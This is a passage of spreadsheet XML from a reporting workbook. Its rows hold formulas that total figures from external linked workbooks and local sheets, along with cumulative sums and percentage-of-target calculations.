      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]3'!$D$27+'[11]3'!$D$18+'[13]3'!$D$26+'[14]3'!$D$10+'[14]3'!$D$17+'[15]3'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]3'!$E$27+'[11]3'!$E$18+'[13]3'!$E$26+'[14]3'!$E$10+'[14]3'!$E$17+'[15]3'!$E$9</f>
        <v>839</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'2'!H8</f>
        <v>3494</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>529030.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]3'!$I$27+'[11]3'!$I$18+'[13]3'!$I$26+'[14]3'!$E$25+'[14]3'!$E$32+'[15]3'!$H$9</f>
        <v>2578.78</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'2'!K8</f>
        <v>7567.41</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>515312.12</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]3'!$L$27+'[11]3'!$L$18+'[13]3'!$L$26+'[14]3'!$H$25+'[14]3'!$H$32+'[15]3'!$K$9</f>
        <v>37806.49</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]3'!$W$108</f>
        <v>126.086956521739</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]3'!$X$108</f>
        <v>127.848484848485</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]3'!$Y$108</f>
        <v>127.43054465547</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]3'!$T$108</f>
        <v>47.9166666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]3'!$U$108</f>
        <v>45.8333333333333</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]3'!$V$108</f>
        <v>27.5698565776459</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]3'!$Q$108</f>
        <v>11.5</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]3'!$R$108</f>
        <v>33</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]3'!$S$108</f>
        <v>2229.85</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]3'!$D$24+'[11]3'!$D$19+'[12]3'!$D$20+'[13]3'!$D$27+'[14]3'!$D$11+'[14]3'!$D$18+'[15]3'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]3'!$E$24+'[11]3'!$E$19+'[12]3'!$E$20+'[13]3'!$E$27+'[14]3'!$E$11+'[14]3'!$E$18+'[15]3'!$E$10</f>
        <v>12047</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'2'!H9</f>
        <v>34542</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4169930.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]3'!$I$24+'[11]3'!$I$19+'[12]3'!$I$20+'[13]3'!$I$27+'[14]3'!$E$26+'[14]3'!$E$33+'[15]3'!$H$10</f>
        <v>13473.413</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'2'!K9</f>
        <v>43852.103</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4141330.914</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]3'!$L$24+'[11]3'!$L$19+'[12]3'!$L$20+'[13]3'!$L$27+'[14]3'!$H$26+'[14]3'!$H$33+'[15]3'!$K$10</f>
        <v>101555.609</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]3'!$W$109</f>
        <v>285.85496866607</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]3'!$X$109</f>
        <v>275.475563359672</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]3'!$Y$109</f>
        <v>271.363295827208</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]3'!$T$109</f>
        <v>46.5416666666667</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]3'!$U$109</f>
        <v>47.4583333333333</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]3'!$V$109</f>
        <v>34.9871414441147</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]3'!$Q$109</f>
        <v>11.17</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]3'!$R$109</f>
        <v>34.17</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]3'!$S$109</f>
        <v>2829.76</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]3'!$D$25+'[11]3'!$D$20+'[12]3'!$D$21+'[13]3'!$D$28+'[14]3'!$D$12+'[14]3'!$D$19+'[15]3'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]3'!$E$25+'[11]3'!$E$20+'[12]3'!$E$21+'[13]3'!$E$28+'[14]3'!$E$12+'[14]3'!$E$19+'[15]3'!$E$11</f>
        <v>2979</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'2'!H10</f>
        <v>7548</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>925075.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]3'!$I$25+'[11]3'!$I$20+'[12]3'!$I$21+'[13]3'!$I$28+'[14]3'!$E$27+'[14]3'!$E$34+'[15]3'!$H$11</f>
        <v>3320.54</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'2'!K10</f>
        <v>10200.66</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>907429.38</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]3'!$L$25+'[11]3'!$L$20+'[12]3'!$L$21+'[13]3'!$L$28+'[14]3'!$H$27+'[14]3'!$H$34+'[15]3'!$K$11</f>
        <v>58554.282</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]3'!$W$110</f>
        <v>0</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]3'!$X$110</f>
        <v>0</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]3'!$Y$110</f>
        <v>268.850893251232</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]3'!$T$110</f>
        <v>0</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]3'!$U$110</f>
        <v>0</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]3'!$V$110</f>
        <v>34.1748269040553</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]3'!$Q$110</f>
        <v>0</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]3'!$R$110</f>
        <v>0</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]3'!$S$110</f>
        <v>2764.06</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]3'!$D$26+'[11]3'!$D$21+'[12]3'!$D$19+'[13]3'!$D$29+'[14]3'!$D$13+'[14]3'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]3'!$E$26+'[11]3'!$E$21+'[12]3'!$E$19+'[13]3'!$E$29+'[14]3'!$E$13+'[14]3'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'2'!H11</f>
        <v>0</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>0</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]3'!$I$26+'[11]3'!$I$21+'[12]3'!$I$19+'[13]3'!$I$29+'[14]3'!$E$28+'[14]3'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'2'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]3'!$L$26+'[11]3'!$L$21+'[12]3'!$L$19+'[13]3'!$L$29+'[14]3'!$H$28+'[14]3'!$H$35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6539.00000000002</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'2'!H12</f>
        <v>21442.0000000001</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>4963833.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>16333.83</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'2'!K12</f>
        <v>44600.451</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5073706.827</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>354701.25400005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>80.7975521640205</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]3'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]3'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]3'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]3'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]3'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]3'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]3'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]3'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]3'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'2'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'2'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>65.0827988990918</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]3'!$W$68</f>
        <v>0</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]3'!$X$68</f>
        <v>277.460317460317</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]3'!$Y$68</f>
        <v>266.394337693732</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]3'!$T$68</f>
        <v>0</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]3'!$U$68</f>
        <v>8.75</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]3'!$V$68</f>
        <v>70.9919634025717</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]3'!$Q$68</f>
        <v>0.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]3'!$R$68</f>
        <v>6.30</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]3'!$S$68</f>
        <v>5741.83</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>1876</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'2'!H14</f>
        <v>4154</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>968697.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>5076.22</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'2'!K14</f>
        <v>14048.366</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1806992.472</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>67564.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]3'!$W$71</f>
        <v>230.676949443016</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]3'!$X$71</f>
        <v>218.901337188291</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]3'!$Y$71</f>
        <v>213.537357831566</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]3'!$T$71</f>
        <v>48.625</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]3'!$U$71</f>
        <v>38.4305555555556</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]3'!$V$71</f>
        <v>50.1257418397626</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]3'!$Q$71</f>
        <v>11.67</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]3'!$R$71</f>
        <v>27.67</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]3'!$S$71</f>
        <v>4054.17</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'2'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>0</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'2'!K15</f>
        <v>473.78</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>115230.28</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]3'!$W$72</f>
        <v>68.3333333333333</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]3'!$X$72</f>
        <v>67.2621359223301</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]3'!$Y$72</f>
        <v>61.3218538193808</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]3'!$T$72</f>
        <v>37.5</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]3'!$U$72</f>
        <v>35.7638888888889</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]3'!$V$72</f>
        <v>50.6212908011869</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]3'!$Q$72</f>
        <v>9.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]3'!$R$72</f>
        <v>25.75</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]3'!$S$72</f>
        <v>4094.25</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'2'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'2'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]3'!$W$73</f>
        <v>67.1111111111111</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]3'!$X$73</f>
        <v>66.6796116504854</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]3'!$Y$73</f>
        <v>62.9396348150271</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]3'!$T$73</f>
        <v>37.5</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]3'!$U$73</f>
        <v>35.7638888888889</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]3'!$V$73</f>
        <v>52.2004203758655</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]3'!$Q$73</f>
        <v>9.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]3'!$R$73</f>
        <v>25.75</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]3'!$S$73</f>
        <v>4221.97</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'2'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'2'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]3'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]3'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]3'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]3'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]3'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]3'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]3'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]3'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]3'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'2'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'2'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]3'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]3'!$X$74</f>
        <v>0</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]3'!$Y$74</f>
        <v>222.404925880448</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]3'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]3'!$U$74</f>
        <v>0</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]3'!$V$74</f>
        <v>6.94770029673591</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]3'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]3'!$R$74</f>
        <v>0</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]3'!$S$74</f>
        <v>561.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'2'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'2'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]3'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]3'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]3'!$Y$72</f>
        <v>9.09883720930233e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]3'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]3'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]3'!$V$72</f>
        <v>4.25321463897132e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]3'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]3'!$R$72</f>
        <v>3e-6</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]3'!$S$72</f>
        <v>0.000344</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'2'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'2'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]3'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]3'!$X$73</f>
        <v>1e-5</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]3'!$Y$73</f>
        <v>239.299857945779</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]3'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]3'!$U$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]3'!$V$73</f>
        <v>71.4852910979229</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]3'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]3'!$R$73</f>
        <v>3e-6</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]3'!$S$73</f>
        <v>5781.730344</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]3'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]3'!$E$22</f>
        <v>5987</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'2'!H21</f>
        <v>17493</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2126931</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]3'!$I$22</f>
        <v>8402.84</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'2'!K21</f>
        <v>22965.1</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2089419.1</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]3'!$L$22</f>
        <v>77581.21</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>165.066404255319</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209">
        <f>'[13]3'!$W$81</f>
        <v>279.70027636115</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]3'!$X$81</f>
        <v>276.242490442381</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]3'!$Y$81</f>
        <v>275.686343847932</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]3'!$T$81</f>
        <v>40.6238425925926</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]3'!$U$81</f>
        <v>40.971450617284</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]3'!$V$81</f>
        <v>36.1679374107045</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]3'!$Q$81</f>
        <v>9.74972222222222</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]3'!$R$81</f>
        <v>29.4994444444444</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]3'!$S$81</f>
        <v>2925.26277777778</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
